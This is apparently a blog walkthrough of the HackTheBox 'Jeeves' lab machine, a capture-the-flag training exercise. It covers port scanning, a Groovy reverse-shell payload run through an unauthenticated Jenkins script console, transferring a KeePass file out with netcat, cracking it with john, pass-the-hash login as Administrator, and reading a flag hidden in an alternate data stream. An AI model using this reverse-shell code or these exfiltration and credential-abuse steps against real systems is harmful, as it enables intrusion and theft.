HTB - Jeeves

HTB – Jeeves

In this walk through, we will be going through the Jeeves room from HackTheBox. This room is rated as Medium on the platform and it consists of exploitation of running Jenkins application. For privilege escalation, we have to crack a Keepass DB to get the admin hash and captured the root flag by exposing it via ADS. So, let’s get started without any delay.


Machine Info:

DescriptionJeeves is not overly complicated, however it focuses on some interesting techniques and provides a great learning experience. As the use of alternate data streams is not very common, some users may have a hard time locating the correct escalation path.


  • I started off with a regular nmap scan with service version detection and found 4 ports opened – 80 (HTTP), 135 (RPC), 445 (SMB) and 50000 (Jetty).

$ sudo nmap -sS -sV

Nmap scan report for
Host is up (0.26s latency).
Not shown: 996 filtered ports
80/tcp    open  http         Microsoft IIS httpd 10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 27.48 seconds

nmap scan

  • Enumerated the application running on port 80 and found that it is redirecting to a page with an error image. Nothing useful here.

Ask Jeeves application

Server error

  • Next, moved to the web server running on port 50000 with the jetty installation. Looked for any known exploits for the installed version but found nothing.

HTTP Error 404

  • Fired up gobuster on the web server to reveal some hidden directories. Got a very late hit at – askjeeves.

$ gobuster dir -u -w ~/Desktop/Wordlist/directory-medium.txt 
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/directory-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2023/12/01 22:19:18 Starting gobuster in directory enumeration mode
/askjeeves            (Status: 302) [Size: 0] [-->]

gobuster scan

Initial Access:

  • Navigating to the directory reveals a Jenkins installation with no authentication required to access.

Jenkins Dashboard

  • Next, i used the below groovy payload in the script console to trigger a reverse shell connection back at my netcat listener on port 4444. Thus, getting the initial foothold.

String host="";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(;while(pe.available()>0)so.write(;while(si.available()>0)po.write(;so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Script Console

initial access

  • Got the user flag. Easy!

user flag

Privilege Escalation:

  • Next, downloaded winpeas on to the target and hoped for some low hanging priv esc vectors but found no luck.

powershell.exe -command iwr -Uri -OutFile winpeas.exe

python HTTP server

download winpeas.exe

  • Moving on, found a Keepass Database file in kohsuke’s documents folder. Downloaded netcat binary on to the target and used it to transfer the database file to our local machine.

powershell.exe -command iwr -Uri -OutFile nc.exe


nc -lp 1234 > pass.kdbx

nc -lp > pass.kdbx

nc.exe -w 3 1234 < CEH.kdbx

nc.exe -2 3 1234 > CEH.kdbx

  • Next, used keepass2john to convert the file into a john crackable hash and then fired john on it to crack the password. Finally got the password – moonshine1

$ ~/Tools/john/run/keepass2john pass.kdbx > hash
wh1terose@fsociety:~/CTF/HTB/machines/Jeeves$ ls
hash  pass.kdbx
wh1terose@fsociety:~/CTF/HTB/machines/Jeeves$ ~/Tools/john/run/john hash 
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:00 DONE 1/3 (2023-12-01 23:24) 0g/s 4129p/s 4129c/s 4129C/s Pass1905..Pass1900
Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst
Enabling duplicate candidate password suppressor
moonshine1       (pass)     
1g 0:00:00:04 DONE 2/3 (2023-12-01 23:24) 0.2169g/s 4636p/s 4636c/s 4636C/s emmitt22..123QWEasd
Use the "--show" op

Keepass DB cracked

  • Used it to access the database and got a NTLM hash for backup.

Backup Stuff hash

  • Tried to pass the hash on to the target machine as user “Administrator” and got a success!

python3 "Administrator"@ -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

got admin access

  • At this point of time, i was confident to get the root flag however one more false positive. The hints asked us to look deeper. That means, the file might contain some hidden text or message.

type hm.txt

  • Downloaded the streams binary onto the target machine to analyze the text file properly for any hidden data.

powershell.exe -command iwr -Uri -OutFile streams.exe

python HTTP server

streams.exe download

  • On using streams binary found out that the root.txt is being hidden inside the the text file using ADS.

streams.exe -accepteula hm.txt

streams.exe -accepteula hm.txt

  • Accessed the data within the hidden file and captured the root flag.

more < hm.txt:root.txt:$DATA

root flag

machine completed

Also Read: HTB – Intelligence



So that was “Jeeves” for you. The machine features a Windows machine that has a Jenkins installation on port 50000. Next, exploited it using the groovy script console to get the initial access. For privilege escalation, found a Keepass database named CEH.kdbx, cracking it gives us the Administrator NTLM hash. Using the hash got access as admin and finally captured the hidden root flag by exposing it via ADS. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top